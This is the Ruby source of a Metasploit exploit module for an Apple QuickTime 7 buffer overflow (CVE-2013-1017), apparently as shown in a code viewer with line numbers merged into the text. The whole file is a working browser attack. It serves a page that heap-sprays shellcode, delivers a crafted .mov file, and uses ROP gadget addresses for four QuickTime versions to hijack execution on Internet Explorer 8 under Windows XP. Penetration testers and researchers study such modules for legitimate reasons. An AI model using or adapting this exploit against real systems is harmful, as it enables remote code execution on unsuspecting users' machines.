Path: blob/master/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
19512 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::RopDb1011def initialize(info = {})12super(13update_info(14info,15'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",16'Description' => %q{17This module exploits a vulnerability found in Apple Quicktime. The flaw is18triggered when Quicktime fails to properly handle the data length for certain19atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer20overflow by loading a specially crafted .mov file, and allows arbitrary21code execution under the context of the current user.22},23'License' => MSF_LICENSE,24'Author' => [25'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor26'Tom Gallagher', # Original Discovery (overlapped)27'Paul Bates', # Original Discovery (overlapped)28'sinn3r' # Metasploit29],30'References' => [31[ 'CVE', '2013-1017' ],32[ 'OSVDB', '93625' ],33[ 'BID', '60097' ],34[ 'URL', 'http://support.apple.com/kb/HT5770' ],35[ 'ZDI', '13-110' ]36],37'Platform' => 'win',38'Targets' => [39# All of the following addresses are from Quicktime.qts40# RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET41[ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', { 'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239 } ],42[ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', { 'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55 } ],43[ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', { 'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259 } ],44[ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', { 'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A } ]45],46'Payload' => {47'BadChars' => "\x00" # js_property_spray no like nilz48},49'DefaultOptions' => {50'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'51},52'Privileged' => false,53'DisclosureDate' => '2013-05-22',54'Notes' => {55'Reliability' => UNKNOWN_RELIABILITY,56'Stability' => UNKNOWN_STABILITY,57'SideEffects' => UNKNOWN_SIDE_EFFECTS58}59)60)61end6263def get_payload(t)64alignment = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -350065p = generate_rop_payload('msvcrt', alignment + payload.encoded, { 'target' => 'xp' })66return p67end6869def targetable?(agent)70if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/71return true72elsif agent =~ /contype/73# contype: a mov file request from Apple Quicktime74return true75end7677false78end7980def get_html(t)81js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))82fake_mov_name = rand_text_alpha(4) + ".mov"83html = %Q|84<html>85<head>86<script>87#{js_property_spray}8889var s = unescape("#{js_p}");90sprayHeap({shellcode:s});91</script>92</head>93<body>94<embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>95</body>96</html>97|9899html.gsub(/^ {4}/, '')100end101102def on_request_uri(cli, request)103agent = request.headers['User-Agent']104print_status("Requesting: #{request.uri}")105106unless targetable?(agent)107print_error("Browser not supported, sending 404: #{agent}")108send_not_found(cli)109return110end111112print_status("Target selected as: #{target.name}") if target113114if request.uri =~ /\.mov$/115print_status("Sending specially crafted .mov file")116send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })117else118html = get_html(target)119send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache' })120end121end122123def sort_bytes(data)124data.map { |e| [e].pack('N').scan(/../).reverse.join }.join125end126127def rop_nop(t)128[t['Nop']].pack('V*') # Ret (QuickTime.qts)129end130131def exploit132buf = ''133buf << rand_text_alpha(467) # 467 to align the pivot13410.times {135buf << rop_nop(target)136}137buf << [138target['Pop'], # POP ESP; RET (QuickTime.qts)1390x20302020 # Target value for ESP (our ROP payload)140].pack('V*')141buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler142buf << sort_bytes([target.ret]) # ADD ESP,280; RET (QuickTime.qts) - pivot143buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size144145# Quicktime File Format Specifications:146# https://developer.apple.com/standards/qtff-2001.pdf147mov = "\x00\x00\x06\xDF" # File size148mov << "moov" # Movie atom149mov << "\x00\x00\x06\xD7" # size (1751d)150mov << "rmra" # Reference Movie atom151mov << "\x00\x00\x06\xCF" # size (1743d)152mov << "rmda" # rmda atom153mov << "\x00\x00\x06\xBF" # size (1727d)154mov << "rdrf" # Data reference atom155mov << "\x00\x00\x00\x00" # size set to 0156mov << "alis" # Data reference type: FS alias record157mov << "\x00\x00\x06\xAA" # Size (1706d)158mov << rand_text_alpha(8)159mov << "\x00\x00\x06\x61" # Size (1633d)160mov << rand_text_alpha(38)161mov << "\x12"162mov << rand_text_alpha(81)163mov << "\xFF\xFF"164mov << rand_text_alpha(18)165mov << "\x00\x08" # Size (8d)166mov << rand_text_alpha(8)167mov << "\x00\x00"168mov << "\x00\x08" # Size (8d)169mov << rand_text_alpha(8)170mov << "\x00\x00"171mov << "\x00\x26" # Size (38d)172mov << rand_text_alpha(38)173mov << "\x00\x0F\x00\x0E"174mov << "AA" # Size (must be invalid)175mov << rand_text_alpha(12)176mov << "\x00\x12\x00\x21"177mov << rand_text_alpha(36)178mov << "\x00"179mov << "\x0F\x33"180mov << rand_text_alpha(17)181mov << "\x02\xF4" # Size (756h)182mov << rand_text_alpha(756)183mov << "\xFF\xFF\x00\x00\x00"184mov << buf185186@exploit = mov187super188end189end190191192